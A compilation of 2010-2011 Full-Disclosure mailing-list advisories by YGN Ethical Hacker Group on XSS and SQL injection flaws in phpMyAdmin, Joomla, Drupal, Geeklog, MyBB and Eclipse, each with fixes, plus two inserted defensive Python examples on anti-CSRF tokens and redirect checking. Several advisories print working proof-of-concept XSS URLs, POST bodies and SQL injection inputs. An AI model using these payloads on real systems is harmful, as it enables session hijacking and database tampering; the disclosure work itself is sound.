http://yehg.net/lab/pr0js/advisories/path_disclosure/

http://yehg.net/lab/pr0js/advisories/path_disclosure.zip


Solution:

Turn php error_display off.

For those who manage servers, set php error_display setting as 'on' in
php.ini file.
For those who don't, simply put php_flag error_display off in the
.htaccess file of the web root directory (unless it is restricted by
php_admin_flag).





[Full-disclosure] phpMyAdmin 3.4.x, 3.4.0 beta 2 <= Stored Cross Site Scripting (XSS) Vulnerability

2011-01-26 Thread YGN Ethical Hacker Group
===
 phpMyAdmin 3.4.x, 3.4.0 beta 2 <= Stored Cross Site Scripting (XSS) Vulnerability
===


1. OVERVIEW

The phpMyAdmin web application 3.4.0 beta 2 and lower versions of
3.4.x were vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

phpMyAdmin is a free software tool written in PHP intended to handle
the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL.
The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations,
indexes, users, permissions, etc), while you still have the ability to
directly execute any SQL statement.


3. VULNERABILITY DESCRIPTION

The 'db' parameter in phpMyAdmin was not sanitized, and an attacker
can inject an XSS string into the 'db' field when creating or renaming
a database. An attacker can create a new database name or rename a
database through several means, such as SQL Injection in the user's
vulnerable web applications or compromise of the user account through
brute force or bypassing CSRF protection.
Even though phpMyAdmin uses httpOnly as a protection against cookie
theft via XSS, an attacker could use an XSS tunneling proxy to
manipulate database names and fields. From there, he could execute
arbitrary database commands to gain higher access to the server.


4. VERSIONS AFFECTED

phpMyAdmin 3.4.0 beta 2 and lower versions of 3.4.x

The vendor confirmed this flaw did not exist before the 3.4 version
family. Thus, it is assumed that 2.x and 3.3 <= versions are not
affected.


5. PROOF-OF-CONCEPT/EXPLOIT

http://demo.phpmyadmin.net/trunk-config/index.php?db=%27%22--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.4.0-b2-xss.jpg


6. IMPACT

Attackers can compromise the currently logged-in user session, plant
XSS backdoors and inject arbitrary SQL statements
(CREATE, INSERT, UPDATE, DELETE) via crafted XSS payloads.


7. SOLUTION

For those who are using phpMyAdmin 3.4.0 beta 2 and lower,
check out the latest commit (git pull).


8. VENDOR

phpMyAdmin (http://www.phpmyadmin.net)


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-01-26: vendor released fix
2011-01-27: vulnerability disclosed


11. REFERENCES

Vendor Commit: 
http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commit;h=f57daa0a59a0058a4b3be1bbdf1577b59d7d697a
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/phpmyadmin/[phpmyadmin-3.4.0-beta2]_cross_site_scripting(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html
Previous Releases:
http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
http://www.phpmyadmin.net/home_page/security/PMASA-2008-5.php
http://www.phpmyadmin.net/home_page/security/PMASA-2008-6.php



#yehg [2011-01-27]




Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
Niels Braczek from the German Joomla! community has released a patch:

http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html

It uses the same Joomla! filtering function and thus is supposed to be safe.


For your convenience, download the patched file from
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip
5368aa00b2d4746e025baa030babc888





Updated advisory.


==
 Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting.
CVE ID, CVE-2011-0005, has been assigned for it.


2. BACKGROUND

Joomla! is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets.


3. VULNERABILITY DESCRIPTION

The ordering parameter in a core module, com_search, is not properly
sanitized and thus vulnerable to XSS.
By leveraging this vulnerability, attackers can compromise the
currently logged-in user/administrator session and impersonate
arbitrary user actions available under /administrator/ functions. As
the vulnerability is in a core module, it affects both classic and
customized Joomla! 1.0.x based web sites.


4. VERSIONS AFFECTED

Joomla! 1.0.x ~ 1.0.15 series


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22


6. SOLUTION

The Joomla! 1.0.x series has been end of life since 2009-07-22.

Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-06)

Apply the third-party patch:
http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-03: notified Joomla! Security Strike Team regardless of EOL status
2011-01-06: vulnerability disclosed
2011-01-07: vendor confirmed that they would not release patch


10. VENDOR RESPONSE

> While noted, your exploit report does not fall within the JSST remit as
> we no longer support J1.0.x branch (as you are aware and indicate).
> The vulnerability mentioned is not known to exist in any current
> supported release.
> Please ensure you are using the latest version of Joomla!


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting
Patched File:
http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip
Joomla! 1.0.x End of Life -
http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-06]

#updated - 2011-01-14
- added patched link
#updated - 2011-01-07
- added VENDOR RESPONSE, CVE ID



[Full-disclosure] Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
==
Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability
==


1. OVERVIEW

Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting.


2. BACKGROUND

Drupal is a free software package that allows anyone to easily
publish, manage and organize a wide variety of content on a website.
Hundreds of thousands of people and organizations are using Drupal to
power an endless variety of sites.


3. VULNERABILITY DESCRIPTION

The 'site_footer', 'name', 'explanation' parameters are not properly
sanitized in administration backend of Drupal 5.x and 6.x versions,
which could allow attackers to conduct stored cross site scripting
attacks.


4. VERSIONS AFFECTED

The vulnerability was tested in Drupal versions 5.23 and 6.20,
currently the latest versions of the 5.x and 6.x families.
The recently released Drupal 7 seems not to be vulnerable.


5. PROOF-OF-CONCEPT/EXPLOIT

= XSS in Footer (parameter: site_footer, module: system, url:
admin/settings/site-information)

The 'site_footer' parameter is not properly sanitized on the site
information page (admin/settings/site-information), and an XSS payload
can be set as the footer text.
The XSS will execute after the Administration theme (url:
admin/settings/admin) is set to Marvin or Chameleon.


= XSS in Role (parameter: name, module: role, url: admin/user/roles)

The 'name' parameter is not properly sanitized, and an XSS payload can
be set as a role name.
This affects administration pages as well as the user registration
page if the role is set to be shown.


= XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)

The 'explanation' parameter is not properly sanitized when adding new

* single-line textfield
* multi-line textfield
* checkbox
* list selection
* freeform list
* URL
* date

XSS can be executed on the user registration page, user profile and
member list pages if the field is set to be visible.


See:
http://attacker.in/drupal6/
http://attacker.in/drupal6/user/register
http://attacker.in/drupal6/user/[ID]/edit/xss


6. IMPACT

This XSS attack can be conducted directly on Drupal sites where the
anti-CSRF form_token check is disabled.
If it is enabled, an attacker must find ways to bypass the anti-CSRF
token using revolutionary or traditional methods.
After compromising it, attackers can plant persistent XSS backdoors in
the user registration page, user profile page, member list pages, and
the user roles and profile settings pages of the administration
backend.


7. SOLUTION

Upgrade to Drupal 7.
Lock down access to administration backend.
Disable Full HTML formatting for sites that allow public user registration.


8. VENDOR

Drupal Development Team
http://drupal.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-12-30: notified vendor
2010-12-31: vendor replied 'not considered as vulnerabilities'
2011-01-14: vulnerability disclosed


11. VENDOR RESPONSE

> The issues you report are not considered security vulnerabilities since
> advanced permissions (which in and of themselves would allow malicious
> users to take over a site) are required in order to exploit them. For
> the issues you reported, administer site configuration is required to
> edit the site footer message, and administer users is required to
> add/edit role names and profile fields.
>
> See the section "What About Vulnerabilities Which Require Advanced
> Permissions?" in http://drupal.org/security-advisory-policy for
> additional information.


12. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/
About Drupal: http://drupal.org/about
Drupal Security Policy: http://drupal.org/security-advisory-policy
Disabling Form Token Check: http://data.agaric.com/node/2343
Anti-CSRF measures and XSS:
http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html
Bypassing CSRF protections:
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
Defeating Anti-CSRF XSS:
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
Defeating Anti-CSRF XSS:
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-14]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
==
Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability
==


1. OVERVIEW

Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting.


2. BACKGROUND

Drupal is a free software package that allows anyone to easily
publish, manage and organize a wide variety of content on a website.
Hundreds of thousands of people and organizations are using Drupal to
power an endless variety of sites.


3. VULNERABILITY DESCRIPTION

The 'site_footer', 'name', 'explanation' parameters are not properly
sanitized in administration backend of Drupal 5.x and 6.x versions,
which could allow attackers to conduct stored cross site scripting
attacks.


4. VERSIONS AFFECTED

The vulnerability was tested in Drupal versions 5.23 and 6.20, currently
the latest versions of the 5.x and 6.x families.
The recently released Drupal 7 is not vulnerable.


5. PROOF-OF-CONCEPT/EXPLOIT

= XSS in Footer (parameter: site_footer, module: system, url:
admin/settings/site-information)

The 'site_footer' parameter is not properly sanitized at site
information page (admin/settings/site-information)
and XSS payload can be set as footer text.
XSS will execute after the Administration theme (url:
admin/settings/admin) is set to Marvin or Chameleon.


= XSS in Role (parameter: name, module: role, url: admin/user/roles)

The 'name' parameter is not properly sanitized and an XSS payload can be
set as a role name.
This affects administration pages as well as the user registration page
if the role is set to be shown.


= XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)

The 'explanation' parameter is not properly sanitized when adding new

* single-line textfield
* multi-line textfield
* checkbox
* list selection
* freeform list
* URL
* date

XSS can be executed in the user registration page, user profile page, and
member list pages if the field is set to be visible.


See:
http://attacker.in/drupal6/
http://attacker.in/drupal6/user/register
http://attacker.in/drupal6/user/[ID]/edit/xss


6. IMPACT

This XSS attack can be directly conducted on Drupal sites where the
anti-CSRF form_token check is disabled.
If it is enabled, the attacker must find ways to bypass the anti-CSRF token
using revolutionary or traditional methods.
After compromising it, attackers can plant persistent XSS backdoors in the
user registration page, user profile page, member list pages, and the user
roles and profile settings pages of the administration backend.


7. SOLUTION

Upgrade to Drupal 7.
Lock down access to administration backend.
Disable Full HTML formatting for sites that allow public user registration.


8. VENDOR

Drupal Development Team
http://drupal.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-12-30: notified vendor
2010-12-31: vendor replied 'not considered as vulnerabilities'
2011-01-14: vulnerability disclosed


11. VENDOR RESPONSE

 The issues you report are not considered security vulnerabilities since
 advanced permissions (which in and of themselves would allow malicious users
 to take over a site) are required in order to exploit them. For the issues
 you reported, administer site configuration is required to edit the site
 footer message, and administer users is required to add/edit role names and
 profile fields.

 See the section What About Vulnerabilities Which Require Advanced
 Permissions? in http://drupal.org/security-advisory-policy for additional
 information.


12. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[drupal.5.x,6x]_cross_site_scripting
About Drupal: http://drupal.org/about
Drupal Security Policy: http://drupal.org/security-advisory-policy
Disabling Form Token Check: http://data.agaric.com/node/2343
Anti-CSRF measures and XSS:
http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html
Bypassing CSRF protections:
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
Defeating Anti-CSRF XSS:
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
Defeating Anti-CSRF XSS:
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-14]


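The advisory and the vendor response above both turn on the same control: the admin-only forms are reachable from a third-party page only if the form token check is disabled or bypassed. The following is an added example, not Drupal's own code, of a session- and form-bound anti-CSRF token and of the difference it makes when a settings handler enforces it or not. The private key, session id, form id and the handler itself are constructed for the example.

```python
import hmac
import hashlib
import secrets

# Server-side secret. Constructed for this example; a real deployment
# loads it from configuration and never sends it to the client.
PRIVATE_KEY = "example-private-key-not-for-real-use"


def make_form_token(session_id: str, form_id: str, key: str = PRIVATE_KEY) -> str:
    """Token bound to both the session and the specific form.

    An HMAC over (session id, form id) means a token captured for one
    user's form cannot be replayed against another user or another form.
    """
    msg = f"{session_id}:{form_id}".encode()
    return hmac.new(key.encode(), msg, hashlib.sha256).hexdigest()


def verify_form_token(token: str, session_id: str, form_id: str,
                      key: str = PRIVATE_KEY) -> bool:
    """Recompute the expected token and compare in constant time."""
    expected = make_form_token(session_id, form_id, key)
    return hmac.compare_digest(token, expected)


def handle_site_information(session_id: str, form_id: str, submitted: dict,
                            enforce_token: bool = True) -> dict:
    """Simplified handler for an admin-only settings form (hypothetical,
    standing in for a page such as admin/settings/site-information).

    With enforce_token=False, the situation the advisory's impact section
    describes, a POST forged from a third-party page is saved exactly like
    a legitimate one.
    """
    if enforce_token:
        token = submitted.get("form_token", "")
        if not verify_form_token(token, session_id, form_id):
            return {"status": 403, "saved": None}
    return {"status": 200, "saved": submitted.get("site_footer")}


def demo() -> tuple:
    """Legitimate POST, forged POST with the check on, forged POST with it off."""
    admin_session = "sess-" + secrets.token_hex(8)
    form_id = "system_site_information_settings"  # constructed form id
    token = make_form_token(admin_session, form_id)

    legit = handle_site_information(
        admin_session, form_id, {"form_token": token, "site_footer": "hello"})
    # A cross-site page cannot read the admin's token, so it can only omit
    # or guess it.
    forged = handle_site_information(
        admin_session, form_id, {"form_token": "", "site_footer": "injected"})
    forged_no_check = handle_site_information(
        admin_session, form_id, {"site_footer": "injected"}, enforce_token=False)
    return legit["status"], forged["status"], forged_no_check["status"]


if __name__ == "__main__":
    print(demo())  # (200, 403, 200)
```

The token never has to be secret from the admin, only from other origins: it is the browser's same-origin policy that keeps a forged page from reading it, which is why the check is worthless if it can be switched off per site.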

Re: [Full-disclosure] Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability

2011-01-13 Thread YGN Ethical Hacker Group
On Fri, Jan 14, 2011 at 4:28 AM, Justin Klein Keane jus...@madirish.net wrote:
 Drupal security has been aware of this issue for quite some time now.
 But basically, as their response indicates, you need admin access to
 exploit these issues.  However, if you have admin access you can execute
 PHP and basically do anything you want.  Your vulnerability hinges on
 being able to bypass the CSRF security in place in Drupal.  Seems like a
 bit of a stretch to release this as an advisory.  Why not include the
 fact that if you can bypass the CSRF detection you can also execute
 arbitrary code with the privileges of the web server?




If you 0wn a server, you 0wn one machine

If you 0wn clients, you 0wn thousands of machines.


http://cyberinsecure.com/?s=iframe


Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-07 Thread YGN Ethical Hacker Group
Joomla! Security Team has confirmed that this issue will not be fixed.


 While noted, your exploit report does not fall within the JSST remit as
 we no longer support J1.0.x branch (as you are aware and indicate).
 The vulnerability mentioned is not known to exist in any current supported release.
 Please ensure you are using the latest version of Joomla!


The advisory has been updated with vendor's response:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.0.x~15%5D_cross_site_scripting

The CVE ID, CVE-2011-0005, has been assigned for it.

 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd



[Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-05 Thread YGN Ethical Hacker Group
==
 Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting.


2. BACKGROUND

Joomla! is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets.


3. VULNERABILITY DESCRIPTION

The ordering parameter in a core module, com_search, is not properly
sanitized and is thus vulnerable to XSS.
By leveraging this vulnerability, attackers can compromise currently
logged-in user/administrator session and impersonate arbitrary user
actions available under /administrator/ functions. As the
vulnerability is based on the core module, it affects both classic and
customized Joomla! 1.0.x based web sites.


4. VERSIONS AFFECTED

Joomla! 1.0.x ~ 1.0.15 series


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22


6. SOLUTION

The Joomla! 1.0.x series has been at end of life since 2009-07-22.

Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-05)


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-03: notified Joomla! Security Strike Team regardless of EOL status
2011-01-06: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting
Joomla! 1.0.x End of Life -
http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-06]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Geeklog 1.7.1 <= Cross Site Scripting Vulnerability

2011-01-03 Thread YGN Ethical Hacker Group
==
 Geeklog 1.7.1 <= Cross Site Scripting Vulnerability
==


1. OVERVIEW

Geeklog was vulnerable to Cross Site Scripting in its administration
backend.


2. BACKGROUND

Geeklog is a PHP/MySQL based application for managing dynamic web content.
Out of the box, it is a blog engine, or a CMS with support for comments,
trackbacks, multiple syndication formats, spam protection, and all the
other vital features of such a system.


3. VULNERABILITY DESCRIPTION

User supplied input is not properly sanitized in the subgroup and
conf_group parameters when the configuration settings are saved in
/admin/configuration.php.
Attackers who manage to get/bypass the anti-CSRF token (_glsectoken) via
other means can effectively perform XSS against admin users.


4. VERSIONS AFFECTED

1.7.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

[Request]

POST /geeklog/admin/configuration.php HTTP/1.1

_glsectoken=&conf_group=Core'--></script><script>alert(/XSS/)</script>&subgroup='--></script><script>alert(/XSS/)</script>

[/Request]


6. SOLUTION

Upgrade to 1.7.1sr1


7. VENDOR

Geeklog Development Team
http://www.geeklog.net/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-31: notified vendor
2011-01-02: vendor released fixed version
2011-01-04: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[geeklog1.7.1]_cross_site_scripting
Vendor Advisory: http://www.geeklog.net/article.php/geeklog-1.7.1sr1
About Geeklog: http://www.geeklog.net/docs/english/#introduction
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-04]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

[Full-disclosure] MyBB 1.6 <= SQL Injection Vulnerability

2010-12-23 Thread YGN Ethical Hacker Group
=
 MyBB 1.6 <= SQL Injection Vulnerability
=



1. OVERVIEW

A potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The keywords parameter was not properly sanitized in /private.php
and /search.php, which leads to an SQL Injection vulnerability.
Full exploitation is probably mitigated by the clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

= /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1


= /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-24]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability

2010-12-19 Thread YGN Ethical Hacker Group

 MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability



1. OVERVIEW

MyBB was vulnerable to Cross Site Scripting.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

Two XSS vulnerabilities were found. One is a user-driven XSS in the url
parameter: the user gets XSSed upon successful log-in.
The other is a reflected XSS in the posthash parameter, where a valid
tid (topic id) is required for a successful attack.
The anti-CSRF check against the my_post_key parameter was not done in
thread/post preview mode, which opened a way for the XSS to succeed.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

User-driven XSS
http://attacker.in/mybb/member.php?action=login&url=javascript:alert%28/XSS/%29

Reflected XSS
http://attacker.in/mybb/newreply.php?my_post_key=&subject=XSS&action=do_newreply&posthash=;<script>alert(/XSS/)</script>&quoted_ids=&lastpid=1&from_page=1&tid=1&method=quickreply&message=test&previewpost=Preview Post


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_cross_site_scripting
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-20]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


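For the user-driven XSS above (a login url parameter that accepts a javascript: target), the defensive check is to validate the post-login redirect before using it. The following added example is not MyBB's code; the site origin, landing page and sample targets are constructed. It accepts only targets that resolve to the site's own origin over http(s) and falls back to a fixed page for anything else, including other schemes, protocol-relative targets and backslash variants.

```python
from urllib.parse import urljoin, urlsplit

# Origin of the forum itself and the page used when a redirect is refused.
# Both constructed for this example.
SITE_ORIGIN = "https://forum.example"
DEFAULT_LANDING = "/index.php"


def is_safe_redirect(target: str, origin: str = SITE_ORIGIN) -> bool:
    """True only for targets that resolve to a page on our own origin.

    Rejects every non-http(s) scheme (javascript:, data:, vbscript: ...),
    protocol-relative targets such as //other.example/, and backslash
    variants that some browsers normalise to slashes.
    """
    if not target or "\\" in target:
        return False
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False
    # Resolve relative forms against our origin, then compare scheme and host.
    resolved = urlsplit(urljoin(origin + "/", target))
    expected = urlsplit(origin)
    return (resolved.scheme.lower(), resolved.netloc.lower()) == \
           (expected.scheme.lower(), expected.netloc.lower())


def post_login_redirect(url_param: str) -> str:
    """Where to send the user after login: the requested page if it passes
    the check, otherwise the fixed landing page."""
    return url_param if is_safe_redirect(url_param) else DEFAULT_LANDING


if __name__ == "__main__":
    for t in ("/thread.php?tid=1", "javascript:alert(1)", "//other.example/"):
        print(repr(t), "->", post_login_redirect(t))
```

Comparing the resolved scheme as well as the host is deliberate: a redirect from https to http on the same host downgrades the session cookie's transport, so it is refused too.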

[Full-disclosure] Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability

2010-11-16 Thread YGN Ethical Hacker Group
=
 Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability
=


1. OVERVIEW

The Help Content web application of Eclipse IDE was vulnerable to
Cross Site Scripting (XSS).


2. PRODUCT DESCRIPTION

Eclipse is a multi-language software development environment
comprising an integrated development environment (IDE) and an
extensible plug-in system. It is written mostly in Java and can be
used to develop applications in Java and, by means of various
plug-ins, other programming languages including Ada, C, C++, COBOL,
Perl, PHP, Python, Ruby (including Ruby on Rails framework), Scala,
and Scheme. The IDE is often called Eclipse ADT for Ada, Eclipse CDT
for C/C++, Eclipse JDT for Java, and Eclipse PDT for PHP.


3. VULNERABILITY DESCRIPTION

Eclipse Help Contents are served as a web application via the built-in
Jetty Web Server plugin. Cross Site Scripting vulnerabilities were
found in the /help/index.jsp and /help/advanced/content.jsp URLs. XSS on
the /help/advanced/content.jsp URL makes the browser hang, but even after
clicking the Stop Executing button, users can still get XSSed.


4. VERSIONS AFFECTED

Eclipse IDE Version: 3.6.1 <=

Tested Editions (SDK, Java, J2EE)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0)
http://localhost:[REPLACE]/help/advanced/content.jsp?'onload='alert(0)


6. IMPACT

In a situation where users' browser security settings are weak, the
localized XSS vector could enable attackers to perform a number of
black acts including cross site content access, SMB share
enumeration, remote code execution, malicious trojan downloading and
execution, etc.


7. SOLUTION

Apply the recent error-free nightly builds (i.e.
http://download.eclipse.org/eclipse/downloads/drops/N20101110-2000/index.php).
According to the developer, Chris Goldthorpe, the fix is in the nightly build
http://download.eclipse.org/eclipse/downloads/drops/N20101108-2000/index.php;
it will also be in 3.6.2 (February 2011) and 3.7 (June 2011).


8. VENDOR

Eclipse Developers Team
http://www.eclipse.org/


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-11-04 : vulnerability discovered
2010-11-05 : notified vendor
2010-11-08 : patch released and applied to svn
2010-11-16 : vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/eclipse/[eclipse_help_server]_cross_site_scripting
Eclipse Bug Tracker: https://bugs.eclipse.org/bugs/show_bug.cgi?id=329582
Previous XSS Flaws:
http://r00tin.blogspot.com/2008/04/eclipse-local-web-server-exploitation.html
(searchView.jsp, workingSetManager.jsp)
Cross Environment Hopping:
http://blog.watchfire.com/wfblog/2008/06/cross-environ-1.html
About Eclipse IDE:
https://secure.wikimedia.org/wikipedia/en/wiki/Eclipse_%28software%29

#yehg [2010-11-16]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-11-05 Thread YGN Ethical Hacker Group
This public disclosure has achieved its aim.

Joomla! Team finally patched this hole.


http://developer.joomla.org/security/news/9-security/10-core-security/323-20101101-core-sqli-info-disclosurevulnerabilities.html

Upgrade to the latest Joomla! version (1.5.22 or later).





1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected in Joomla! CMS version
1.5.20. These flaws were reported along with our Cross Site Scripting Flaw
which was fixed in 1.5.21. Developers believed that our reported SQL
Injection flaws are not fully exploitable because of Joomla! built-in
string filters, and they were not fixed in 1.5.21, which is currently the
latest version.

As a result, we disclosed these flaws in order for someone to exploit
them to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
